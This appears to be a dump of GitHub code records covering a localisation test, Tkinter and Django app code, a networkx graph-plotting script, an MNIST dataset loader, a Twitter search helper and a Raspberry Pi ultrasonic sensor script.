Fonts' : u'Activate Plural',\n u'Activate %lu Font' : u'Activate Singular',\n u'Deactivate %lu Fonts' : u'Deactivate Plural',\n u'Deactivate %lu Font' : u'Deactivate Singular'\n },\n \"French\",\n \"fr\",\n True,\n vcs_class,\n None\n ),\n os.path.join(\"Resources\", \"test.stringsdict\")\n )\n\n self.assertEquals(\n test_file.getvalue(),\n StringsDictTests.translated_strings\n )\n\n mkdir_func.assert_called_with(\n \"Resources\"\n )\n\n translator._open_file_for_writing.assert_called_with(\n os.path.join(\"Resources\", \"test.stringsdict\")\n )\n\n vcs_class.add_file.assert_called_with(\n os.path.join(\"Resources\", \"test.stringsdict\")\n )\n\n file.close()\n","repo_name":"Extensis/Burton","sub_path":"burton/parser/test/stringsdicttests.py","file_name":"stringsdicttests.py","file_ext":"py","file_size_in_byte":7518,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"30039024155","text":"# https://www.codewars.com/kata/52549d3e19453df56f0000fe\r\n\r\ndef fib(n):\r\n i = 0\r\n fib = [0,1]\r\n while i + 2 < n:\r\n fib_new = fib[i] + fib[i+1]\r\n 
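# append the next term until the list holds n entries\r\n        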
fib.append(fib_new)\r\n        i += 1\r\n    return fib[n-1]\r\n","repo_name":"jgmarquesm/Python","sub_path":"Exercícios/Codewars/6kyu - Fibonacci Reloaded.py","file_name":"6kyu - Fibonacci Reloaded.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"34212040080","text":"try:\n\tfrom Tkinter import *\nexcept ImportError:\n\tfrom tkinter import *\ntry:\n\tfrom \t\ttkColorChooser import askcolor\nexcept ImportError:\n\tfrom\t\ttkinter.colorchooser import askcolor\ntry:\n\timport \ttkFileDialog\nexcept ImportError:\n\timport\ttkinter.filedialog as tkFileDialog\ntry:\n\timport \ttkMessageBox\nexcept ImportError:\n\timport\ttkinter.messagebox as tkMessageBox\ntry:\n\timport \tttk\n\tfrom \t\tttk import *\nexcept ImportError:\n\tfrom tkinter import ttk\n\t#from \t\tttk import *\ntry:\n\timport \ttkFont\nexcept ImportError:\n\timport\ttkinter.font as tkFont\n\nimport PIL\nfrom PIL import Image, ImageTk, ExifTags\n\nfrom Utils import UnderConstruction\nfrom Tooltip import *\n\n#\n# Generic Dialog Class - All dialogs inherit from this one\n#\nclass Dialog:\n\tdef __init__ ( self, parent, modal=True, title='No title supplied',\n\t\t\t\t   showtitlebar=True, centerTo='default', okonly=True,\n\t\t\t\t   help=False, resizable=False, minwidth=None, minheight=None,\n\t\t\t\t   camera=None, data = None ):\n\t\tself._parent = parent\n\t\tself.modal = modal\n\t\tself._window = Toplevel()\n\t\tself._window.minsize(minwidth,minheight)\n\t\tself.CancelButton = None\n\n\t\tif resizable is False:\n\t\t\tself._window.resizable(width=False,height=False)\n\n\t\tself._window.rowconfigure(0,weight=1)\n\t\tself._window.columnconfigure(0,weight=1)\n\t\tself._window.title(title)\n\t\tself._centerTo = centerTo\n\n\t\t# Should be:\t\t\tNeed to fix.....\n\t\t# self._mainFrame\n\t\t#\tself.LayoutFrame\n\t\t#\t\tSupplied to User for Layout\n\t\t#\tself._buttonFrame\n\t\t#\t\tHelp\tCancel\tOk\n\t\tself.MainFrame = ttk.Frame(self._window,padding=(5,5,5,5))\n\t\tself.MainFrame.grid(row=0,column=0,columnspan=3,sticky='NSEW')\n\n\t\tself._camera = camera\n\t\tself.data = data\n\n\t\tself.okimage = ImageTk.PhotoImage(file='Assets/ok_22x22.png')\n\t\tself.OkButton = ttk.Button(self._window,text='Close' if okonly else 'Ok',\n\t\t\tcommand=lambda:self._Ok(None),image=self.okimage,compound='left')\n\t\tself.OkButton.grid(row=1,column=2,padx=10,pady=5)\n\t\tself.OkButton.focus_set()\n\t\tToolTip(self.OkButton,50)\n\t\tself._window.bind( '<Return>', self._Ok )\n\n\t\tif okonly is False:\n\t\t\tself.cancelimage = ImageTk.PhotoImage(file='Assets/cancel_22x22.png')\n\t\t\tself.CancelButton = ttk.Button(self._window,text='Cancel',\n\t\t\t\tcommand=lambda:self._Cancel(None),image=self.cancelimage,\n\t\t\t\tcompound='left',state='disabled')\n\t\t\tself.CancelButton.grid(row=1,column=1,pady=5)\n\t\t\tToolTip(self.CancelButton,51)\n\t\t\tself._window.bind( '<Escape>', self._Cancel )\n\n\t\tif help is True:\n\t\t\tb = ttk.Button(self._window,text='Help',command=lambda:self._Help(None))\n\t\t\tb.grid(row=1,column=0,sticky='W',padx=10,pady=5)\n\t\t\tToolTip(b,52)\n\t\t\tself._window.bind( '<F1>', self._Help )\n\n\t\tself.BuildDialog()\t# Overriden function\n\n\t\tself._window.after(10,self._Position)\t# better way found!\n\t\tself._window.overrideredirect(not showtitlebar)\n\t\tself._window.transient(self._parent)\t# no icon\n\n\t\tif modal is True:\t# must close this dialog to return to parent\n\t\t\tself._window.grab_set()\n\t\t\tself._parent.wait_window(self._window)\n\n\tdef BuildDialog ( self ):\t\t\t\t# Always 
Override\n\t\tUnderConstruction ( self.MainFrame )\n\tdef OkPressed ( self ): return True\t\t# Optional Override\n\tdef CancelPressed ( self ): return True\t# Optional Override\n\tdef HelpPressed ( self ):\t\t\t\t# Optional Override\n\t\ttkMessageBox.showwarning(\"Help\",\"No Help available!\")\n\n\t# Remap these so the dialog doesn't have to worry about the\n\t# 'event' parameter\n\tdef _Ok ( self, event ):\n\t\tif self.OkPressed(): self._window.destroy()\n\tdef _Cancel ( self, event ):\n\t\tif self.CancelPressed() : self._window.destroy()\n\tdef _Help ( self, event ):\n\t\tself.HelpPressed()\n\n\tdef _Position ( self ):\n\t\tif self._centerTo == 'default': return\n\t\t# handle center window and center screen\n\t\tif self._centerTo == 'parent':\n\t\t\tparentwidth = self._parent.winfo_width()\n\t\t\tparentheight = self._parent.winfo_height()\n\t\t\tlocX = self._parent.winfo_x()\n\t\t\tlocY = self._parent.winfo_y()\n\t\telse:\t# center to 'screen'\n\t\t\tparentwidth = self._parent.winfo_screenwidth()\n\t\t\tparentheight = self._parent.winfo_screenheight()\n\t\t\tlocX = 0\n\t\t\tlocY = 0\n\t\twidth = self._window.winfo_width()\n\t\theight = self._window.winfo_height()\n\t\tx = locX + parentwidth/2 - width / 2\n\t\ty = locY + parentheight / 2 - height / 2\n\t\tself._window.geometry('%dx%d+%d+%d' % (width,height,x,y))\n\n\n\n","repo_name":"Billwilliams1952/PiCameraApp","sub_path":"Source/Dialog.py","file_name":"Dialog.py","file_ext":"py","file_size_in_byte":4167,"program_lang":"python","lang":"en","doc_type":"code","stars":266,"dataset":"github-code","pt":"52"} +{"seq_id":"40434009987","text":"\"\"\"\nDjango settings for move_out project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport dj_database_url\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = os.environ.get('SECRET_KEY', 'super_secret_key')\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = 'DJANGO_DEBUG' in os.environ\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'things',\n 'bootstrapform',\n 'storages',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'move_out.urls'\n\nWSGI_APPLICATION = 'move_out.wsgi.application'\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'Europe/Warsaw'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# 
https://docs.djangoproject.com/en/1.7/howto/static-files/\n\n\nSTATICFILES_DIRS = (\n    os.path.join(BASE_DIR, \"static\"),\n)\n\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n    'django.contrib.auth.context_processors.auth',\n    'django.core.context_processors.debug',\n    'django.core.context_processors.i18n',\n    'django.core.context_processors.media',\n    'django.core.context_processors.static',\n    'django.core.context_processors.tz',\n    'django.core.context_processors.request',\n    'django.contrib.messages.context_processors.messages',\n    'django_settings_export.settings_export',\n)\n\nAWS_HEADERS = { # see http://developer.yahoo.com/performance/rules.html#expires\n    'Expires': 'Thu, 31 Dec 2099 20:00:00 GMT',\n    'Cache-Control': 'max-age=94608000',\n}\n\nAWS_STORAGE_BUCKET_NAME = os.environ.get('AWS_STORAGE_BUCKET_NAME')\nAWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID')\nAWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY')\n\nAWS_S3_CUSTOM_DOMAIN = '%s.s3.amazonaws.com' % AWS_STORAGE_BUCKET_NAME\n\nSTATIC_ROOT = 'staticfiles'\nSTATIC_URL = '/static/'\n\nif AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY:\n    MEDIA_URL = \"https://%s/\" % (AWS_S3_CUSTOM_DOMAIN, )\n    DEFAULT_FILE_STORAGE = 'move_out.custom_storages.MediaStorage'\nelse:\n    MEDIA_ROOT = os.path.join(BASE_DIR, \"media\")\n    MEDIA_URL = '/media/'\n\nEMAIL_BACKEND = \"sgbackend.SendGridBackend\"\nSENDGRID_USER = os.environ.get('SENDGRID_USER')\nSENDGRID_PASSWORD = os.environ.get('SENDGRID_PASSWORD')\nSENDGRID_FROM_EMAIL = os.environ.get('SENDGRID_FROM_EMAIL')\n\nDATABASES = {\n    'default': dj_database_url.config(default='sqlite:///' + os.path.join(BASE_DIR, 'db.sqlite3'))\n}\n\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\n\nALLOWED_HOSTS = ['*']\n\nSETTINGS_EXPORT = [\n    'SENDGRID_FROM_EMAIL',\n]\n","repo_name":"asendecka/move-out","sub_path":"move_out/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3628,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"19475423746","text":"from django.db import models\nfrom meajudaaajudar.models import Instituicao\n\n\nclass Donation(models.Model):\n    # stamped automatically when the donation row is first created\n    time = models.DateTimeField(auto_now_add=True)\n    instituicao = models.ForeignKey(Instituicao, on_delete=models.CASCADE)\n\n    class Meta:\n        db_table = \"donation\"\n","repo_name":"sylleryum/meajudaaajudarpython","sub_path":"meajudaaajudar/models/donation.py","file_name":"donation.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24251362644","text":"import networkx as nx\r\nimport matplotlib.pyplot as plt\r\nimport sys\r\nimport itertools\r\n\r\n#############################\r\n######  file structure ######\r\n############################\r\n\r\n#+-- images\r\n#+-- instances\r\n#| +-- Arabidopsis.txt\r\n#| +-- smallArabidopsis.txt\r\n#| +-- Important.txt\r\n#| +-- smallImportant.txt\r\n#| +-- Down.txt\r\n#| +-- smallDown.txt\r\n#| +-- Up.txt\r\n#| +-- smallUp.txt\r\n#+-- src\r\n#| +-- MinSteinerTree.py\r\n#| +-- ReloadFigure.py\r\n#| +-- Treeify.py\r\n#| +-- _edges.txt\r\n#| +-- _noi.txt\r\n#| +-- _ndown.txt\r\n#| +-- _nup.txt\r\n#| +-- pathways.csv\r\n\r\n\r\n# The code to generate the tree using networkx was taken from: https://stackoverflow.com/questions/29586520/can-one-get-hierarchical-graphs-from-networkx-with-python-3\r\ndef hierarchy_pos(G, root, width=1., vert_gap = 0.2, vert_loc = 0, xcenter = 0.5,\r\n                  pos = None, parent = None):\r\n    '''If there is a 
cycle that is reachable from root, then this will see infinite recursion.\r\n G: the graph\r\n root: the root node of current branch\r\n width: horizontal space allocated for this branch - avoids overlap with other branches\r\n vert_gap: gap between levels of hierarchy\r\n vert_loc: vertical location of root\r\n xcenter: horizontal location of root\r\n pos: a dict saying where all nodes go if they have been assigned\r\n parent: parent of this branch.'''\r\n if pos == None:\r\n pos={}\r\n pos[root] = (xcenter, vert_loc)\r\n neighbors = list(G.neighbors(root))\r\n if parent != None:\r\n neighbors.remove(parent)\r\n if len(neighbors)!=0:\r\n dx = width/len(neighbors)\r\n nextx = xcenter - width/2 - dx/2\r\n for neighbor in neighbors:\r\n nextx += dx\r\n pos = hierarchy_pos(G, neighbor, width = dx, vert_gap = vert_gap,\r\n vert_loc = vert_loc-vert_gap, xcenter=nextx, pos=pos,\r\n parent = root)\r\n return pos\r\n\r\n# The code can be run as: python Treeify.py testing AT1G62360.1 -all\r\n# where testing will be the name of the image files produced (in the images folder)\r\n# AT1G62360.1 is the node we are looking for\r\n# and -all signals that all nodes will be labeled\r\n\r\nedgeName=\"_edges.txt\"\r\nnoiName=\"_noi.txt\"\r\nndownName=\"_ndown.txt\"\r\nnupName=\"_nup.txt\"\r\nH=nx.read_edgelist(edgeName)\r\n\r\npaths=dict(nx.all_pairs_shortest_path(H))\r\ndeg=nx.degree_centrality(H)\r\n\r\nmyPathways=open(\"pathways.csv\", 'w')\r\n\r\nleafs=[i for i in H.nodes() if deg[i]*(H.number_of_nodes()-1)==1]\r\n#print(len(leafs))\r\n\r\ngene=\"3702.\"+sys.argv[2]\r\n\r\noptions=[]\r\nfor i in range(3,(len(sys.argv))):\r\n options.append(sys.argv[i])\r\n\r\n\r\nfor (i,j) in itertools.combinations(leafs, 2):\r\n for l in paths[i][j]:\r\n myPathways.write(str(l)+\",\")\r\n myPathways.write(\"\\n\")\r\n myPathways.flush()\r\n\r\nnoi=[]\r\nwith open(noiName, 'r') as f:\r\n for line in f:\r\n line = line.rstrip()\r\n noi.append(line)\r\nnblue=[]\r\nfor i in H.nodes():\r\n if str(i) in noi:\r\n nblue.append(i)\r\n#print(nblue)\r\nndown=[]\r\nwith open(ndownName, 'r') as f:\r\n for line in f:\r\n line = line.rstrip()\r\n ndown.append(line)\r\nnred=[]\r\nfor i in H.nodes():\r\n if str(i) in ndown:\r\n nred.append(i)\r\n#print(nred)\r\nnup=[]\r\nwith open(nupName, 'r') as f:\r\n for line in f:\r\n line = line.rstrip()\r\n nup.append(line)\r\nngreen=[]\r\nfor i in H.nodes():\r\n if str(i) in nup:\r\n ngreen.append(i)\r\n#print(ngreen)\r\n\r\nmyLabels={}\r\nif \"-all\" in options:\r\n for i in H.nodes():\r\n myLabels[i]=str(i)\r\n myLabels[i]=myLabels[i].replace(\"3702.\",\"\")\r\nelse:\r\n if \"-imp\" in options:\r\n for i in nblue:\r\n myLabels[i]=str(i)\r\n myLabels[i]=myLabels[i].replace(\"3702.\",\"\")\r\n if \"-down\" in options:\r\n for i in nred:\r\n myLabels[i]=str(i)\r\n myLabels[i]=myLabels[i].replace(\"3702.\",\"\")\r\n if \"-up\" in options:\r\n for i in ngreen:\r\n myLabels[i]=str(i)\r\n myLabels[i]=myLabels[i].replace(\"3702.\",\"\")\r\n if \"-not\" in options:\r\n for i in H.nodes():\r\n if i not in nblue and i not in ngreen and i not in nred:\r\n myLabels[i]=str(i)\r\n myLabels[i]=myLabels[i].replace(\"3702.\",\"\")\r\n\r\n\r\nnList=[]\r\nfound=False\r\nfor i in H.nodes():\r\n nList.append(i)\r\n if str(i)==gene:\r\n found=True\r\n geneNode=i\r\n\r\n\r\n\r\n\r\nif found:\r\n pos = hierarchy_pos(H,geneNode)\r\n plt.figure(1,figsize=(12,12))\r\n nx.draw(H, pos=pos, with_labels=False)\r\n nx.draw_networkx_nodes(H,pos,nodelist=nList,node_color='b')\r\n 
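# overdraw the highlighted subsets so their colours sit on top of the blue base layer: red = down-regulated (ndown), green = up-regulated (nup), yellow = nodes of interest (noi)\r\n 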
nx.draw_networkx_nodes(H,pos,nodelist=nred,node_color='r')\r\n nx.draw_networkx_nodes(H,pos,nodelist=ngreen,node_color='g')\r\n nx.draw_networkx_nodes(H,pos,nodelist=nblue,node_color='y')\r\n nx.draw_networkx_labels(H, pos, myLabels, font_size=12, font_family='sans-serif')\r\n outName=\"../images/\"+sys.argv[1]+\"_Tree_\"+gene+\".pdf\"\r\n plt.savefig(outName, bbox_inches='tight', dpi=300)\r\n #\r\n plt.show()\r\n \r\n newH=nx.Graph(H)\r\n newH.remove_node(geneNode)\r\n allComponents=sorted(nx.connected_component_subgraphs(newH), key = len, reverse=True)\r\n cnt=1\r\n for C in allComponents:\r\n Cnred=[]\r\n Cngreen=[]\r\n Cnblue=[]\r\n for i in C.nodes():\r\n if str(i) in ndown:\r\n Cnred.append(i)\r\n if str(i) in nup:\r\n Cngreen.append(i)\r\n if str(i) in noi:\r\n Cnblue.append(i)\r\n CmyLabels={}\r\n for i in C.nodes():\r\n CmyLabels[i]=str(i)\r\n CmyLabels[i]=CmyLabels[i].replace(\"3702.\",\"\")\r\n\r\n #print(nred)\r\n pos=nx.spectral_layout(C, scale=1.0)\r\n plt.figure(1,figsize=(12,12))\r\n nx.draw(C,pos)\r\n nx.draw_networkx_labels(C, pos, CmyLabels, font_size=12, font_family='sans-serif')\r\n #nx.draw_networkx_edges(H, pos, edgelist=H.edges())\r\n nx.draw_networkx_nodes(C,pos,nodelist=C.nodes(),node_color='b')\r\n nx.draw_networkx_nodes(C,pos,nodelist=Cnred,node_color='r')\r\n nx.draw_networkx_nodes(C,pos,nodelist=Cngreen,node_color='g')\r\n nx.draw_networkx_nodes(C,pos,nodelist=Cnblue,node_color='y')\r\n #nx.draw_networkx_labels(C,pos, myLabels, font_size=12, font_family='sans-serif')\r\n outName=\"../images/\"+sys.argv[1]+\"_Subtrees\"+str(cnt)+\".pdf\"\r\n plt.savefig(outName, bbox_inches='tight', dpi=300)\r\n #\r\n #plt.show()\r\n cnt=cnt+1\r\n\r\nelse:\r\n print(sys.argv[2]+\" not Found\")\r\n\r\n\r\n","repo_name":"Gazala-Ameen/PPIN","sub_path":"Treeify.py","file_name":"Treeify.py","file_ext":"py","file_size_in_byte":6530,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"42203655990","text":"def I(): return(list(map(int,input().split())))\r\nn=int(input())\r\nx=I()\r\nm=int(input())\r\nq=I()\r\narr=[0]*(n+1)\r\narr[0]=x[0]\r\nfor i in range(n-1):\r\n\tarr[i+1]=arr[i]+x[i+1]\r\n\r\nfor i in range(m):\r\n\r\n\tl=0\r\n\tr=n-1\r\n\r\n\twhile(l<=r):\r\n\t\tmid=(r-l)//2+l\r\n\t\tif arr[mid]x{}'.format(color, text)\n return text\n\n\ndef _orange(text):\n return _colorize(\"#999922\", text)\n\n\ndef _blue(text):\n return _colorize(\"#2222ee\", text)\n","repo_name":"realtimeprojects/acre-lib","sub_path":"src/acre/steps/videorecorder.py","file_name":"videorecorder.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42784903300","text":"def spy_game(nums):\r\n spyno=[0,0,7,'x']\r\n for i in nums:\r\n if i == spyno[0]:\r\n spyno.pop(0)\r\n return len(spyno) == 1\r\n\r\ndef lst():\r\n\r\n lst =[]\r\n n= int(input(\"Enter no. 
of values to be inserted in the list:\"))\r\n print(\"Enter elements:\")\r\n for i in range(0,n):\r\n ele = int(input())\r\n lst.append(ele)\r\n return (lst)\r\n\r\nnums = lst()\r\nspy_game(nums)\r\n","repo_name":"somnov18/Python-programs","sub_path":"spy_game.py","file_name":"spy_game.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"73877935204","text":"\"\"\"\nCopied from https://github.com/yoonholee/pytorch-vae/blob/master/data_loader/fixed_mnist.py\n\"\"\"\n\nimport h5py\nimport torch\nimport torch.utils.data as data\nfrom torchvision import transforms\nimport os\nimport numpy as np\nfrom PIL import Image\nimport urllib.request\n\n\nclass fixedMNIST(data.Dataset):\n \"\"\" Binarized MNIST dataset, proposed in\n http://proceedings.mlr.press/v15/larochelle11a/larochelle11a.pdf \"\"\"\n\n train_file = \"binarized_mnist_train.amat\"\n val_file = \"binarized_mnist_valid.amat\"\n test_file = \"binarized_mnist_test.amat\"\n\n def __init__(self, root, train=True, transform=None, download=False):\n # we ignore transform.\n self.root = os.path.expanduser(root)\n self.train = train # training set or test set\n\n if download:\n self.download()\n if not self._check_exists():\n raise RuntimeError(\n \"Dataset not found.\" + \" You can use download=True to download it\"\n )\n\n self.data = self._get_data(train=train)\n\n def __getitem__(self, index):\n img = self.data[index]\n img = Image.fromarray(img)\n img = transforms.ToTensor()(img).type(torch.FloatTensor)\n return img, torch.tensor(-1) # Meaningless tensor instead of target\n\n def __len__(self):\n return len(self.data)\n\n def _get_data(self, train=True):\n with h5py.File(os.path.join(self.root, \"data.h5\"), \"r\") as hf:\n data = hf.get(\"train\" if train else \"test\")\n data = np.array(data)\n return data\n\n def get_mean_img(self):\n return self.data.mean(0).flatten()\n\n def download(self):\n if self._check_exists():\n return\n if not os.path.exists(self.root):\n os.makedirs(self.root)\n\n print(\"Downloading MNIST with fixed binarization...\")\n for dataset in [\"train\", \"valid\", \"test\"]:\n filename = \"binarized_mnist_{}.amat\".format(dataset)\n url = \"http://www.cs.toronto.edu/~larocheh/public/datasets/binarized_mnist/binarized_mnist_{}.amat\".format(\n dataset\n )\n print(\"Downloading from {}...\".format(url))\n local_filename = os.path.join(self.root, filename)\n urllib.request.urlretrieve(url, local_filename)\n print(\"Saved to {}\".format(local_filename))\n\n def filename_to_np(filename):\n with open(filename) as f:\n lines = f.readlines()\n return np.array([[int(i) for i in line.split()] for line in lines]).astype(\n \"int8\"\n )\n\n train_data = np.concatenate(\n [\n filename_to_np(os.path.join(self.root, self.train_file)),\n filename_to_np(os.path.join(self.root, self.val_file)),\n ]\n )\n test_data = filename_to_np(os.path.join(self.root, self.test_file))\n with h5py.File(os.path.join(self.root, \"data.h5\"), \"w\") as hf:\n hf.create_dataset(\"train\", data=train_data.reshape(-1, 28, 28))\n hf.create_dataset(\"test\", data=test_data.reshape(-1, 28, 28))\n print(\"Done!\")\n\n def _check_exists(self):\n return os.path.exists(os.path.join(self.root, \"data.h5\"))\n","repo_name":"HEmile/storchastic","sub_path":"examples/dataloader/fixed_mnist.py","file_name":"fixed_mnist.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","stars":164,"dataset":"github-code","pt":"52"}
+{"seq_id":"25923926805","text":"from django import template\nimport re\n# Module-level instance object for creating a valid tag library\nregister = template.Library()\n\n# Custom filter to be used in templates\n@register.filter\ndef add_link(value):\n # Get the content member variable of the passed-in value object.\n content = value.content\n # Return a queryset that fetches the entire tag_set of the passed-in value object\n tags = value.tag_set.all()\n\n # Iterate over tags and replace each matching string in content with a string containing a link\n for tag in tags:\n # re.sub(pattern, replacement, string)\n\n content = re.sub(r'\\#'+tag.name+ r'\\b', '#'+tag.name+'', content)\n return content\n\n","repo_name":"JoungMinJu/kakaoWeb","sub_path":"kakaoWeb/community/templatetags/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"10073265717","text":"from searchtweets import load_credentials\r\nfrom searchtweets import gen_rule_payload\r\nfrom searchtweets import ResultStream\r\nimport yaml\r\nimport json\r\n\r\ndef get_file(aname, cak, cask, etype, hashtag, keywords, fdate = '00-00-0000', tdate = '00-00-0000', ftime = '00:00', ttime = '00:00'):\r\n \r\n if etype == 'efa': # Full archive scraping (refer to limits on README)\r\n endp = 'https://api.twitter.com/1.1/tweets/search/fullarchive/' + aname + '.json'\r\n elif etype == 'tdays': # 30 days scraping (refer to limits on README)\r\n endp = 'https://api.twitter.com/1.1/tweets/search/30day/' + aname + '.json'\r\n else:\r\n endp = 'ERROR'\r\n \r\n # Creating a yaml credentials file\r\n config = dict(\r\n search_tweets_api = dict(\r\n account_type = 'premium',\r\n endpoint = endp,\r\n consumer_key = cak,\r\n consumer_secret = cask\r\n )\r\n )\r\n\r\n with open('C:\\\\Users\\\\Samuktha\\\\Documents\\\\USC\\\\twitter\\\\proj\\\\cred.yaml', 'w') as config_file:\r\n yaml.dump(config, config_file, default_flow_style=False)\r\n \r\n # loading credentials\r\n premium_search_args = load_credentials('C:\\\\Users\\\\Samuktha\\\\Documents\\\\USC\\\\twitter\\\\proj\\\\cred.yaml',\r\n yaml_key = 'search_tweets_api',\r\n env_overwrite = True)\r\n print(premium_search_args)\r\n \r\n if etype == 'efa':\r\n rule = gen_rule_payload(results_per_call = 100,\r\n from_date = fdate + ' '+ ftime, #\"2019-07-06 01:00\",\r\n to_date = tdate + ' ' + ttime, #\"2019-07-06 02:15\",\r\n pt_rule = keywords,\r\n )\r\n else:\r\n rule = gen_rule_payload(results_per_call = 100,\r\n pt_rule = keywords)\r\n \r\n \r\n # result stream\r\n\r\n rs = ResultStream(rule_payload = rule,\r\n max_results = 50,\r\n **premium_search_args)\r\n \r\n\r\n \r\n \r\n return rs\r\n","repo_name":"samyuktha17/GetTweetsNow","sub_path":"source_tweets.py","file_name":"source_tweets.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"4816817600","text":"import RPi.GPIO as GPIO \nGPIO.setmode(GPIO.BCM) \nimport time\n \nGPIO.setup(9, GPIO.IN, pull_up_down=GPIO.PUD_UP) \nGPIO.setup(17, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n\nTRIG = 23\nECHO = 24\nTRIG1=14\nECHO1=15\nTRIG2=2\nECHO2=3\nTRIG3=27\nECHO3=22\nwater_trig=5\nwater_echo=6\n\n\ndef distance(GPIO_TRIGGER,GPIO_ECHO):\n GPIO.setup(GPIO_TRIGGER, GPIO.OUT)\n GPIO.setup(GPIO_ECHO, GPIO.IN)\n\n\n # set Trigger to HIGH\n GPIO.output(GPIO_TRIGGER, True)\n \n # set Trigger after 0.01ms to LOW\n time.sleep(0.00001)\n GPIO.output(GPIO_TRIGGER, False)\n \n StartTime = time.time()\n StopTime = time.time()\n \n # save StartTime\n while GPIO.input(GPIO_ECHO) == 0:\n 
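# busy-wait until the echo pin goes high; StartTime keeps being re-stamped so it ends up marking the start of the echo pulse\n 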
StartTime = time.time()\n \n # save time of arrival\n while GPIO.input(GPIO_ECHO) == 1:\n StopTime = time.time()\n \n # time difference between start and arrival\n TimeElapsed = StopTime - StartTime\n # multiply with the sonic speed (34300 cm/s)\n # and divide by 2, because there and back\n distance = (TimeElapsed * 34300) / 2\n \n return distance\n\ndef my_callback(channel):\n while True:\n dist1 = distance(TRIG,ECHO)\n print (\"Measured Distance from the first 90 degree= %.1f cm\" % dist1)\n time.sleep(1)\n\n dist2 = distance(TRIG1,ECHO1)\n print (\"Measured Distance from the second 90 degree= %.1f cm\" % dist2)\n time.sleep(1)\n\n dist3 = distance(TRIG2,ECHO2)\n print (\"Measured Distance from the third 90 degree= %.1f cm\" % dist3)\n time.sleep(1)\n\n dist4 = distance(TRIG3,ECHO3)\n print (\"Measured Distance from the fourth 90 degree= %.1f cm\" % dist4)\n time.sleep(1)\n \n water_pres= distance(water_trig,water_echo)\n print (\"water present= %.1f cm\" % water_pres)\n time.sleep(1)\n water_pres=14-water_pres\n print(water_pres)\n if(water_pres==4):\n water=\"water present\"\n elif(water_pres>4):\n water=\"More water\"\n \n elif(water_pres>2 and water_pres<4):\n water=\"Add 1 litre water\"\n else:\n water=\"In need of water\"\n print(water)\n if(dist1<45 or dist2<45 or dist3<45 or dist4<45):\n print(\"Made high\")\n time.sleep(2)\n print(\"Made low\")\n time.sleep(1)\n \n \n \n\n \nGPIO.add_event_detect(17, GPIO.RISING, callback=my_callback) \n \ntry: \n GPIO.wait_for_edge(9, GPIO.FALLING) \n GPIO.cleanup() \n \nexcept KeyboardInterrupt: \n GPIO.cleanup() # clean up GPIO on CTRL+C exit \nGPIO.cleanup() \n","repo_name":"vigneshesan/growthbox","sub_path":"haha.py","file_name":"haha.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
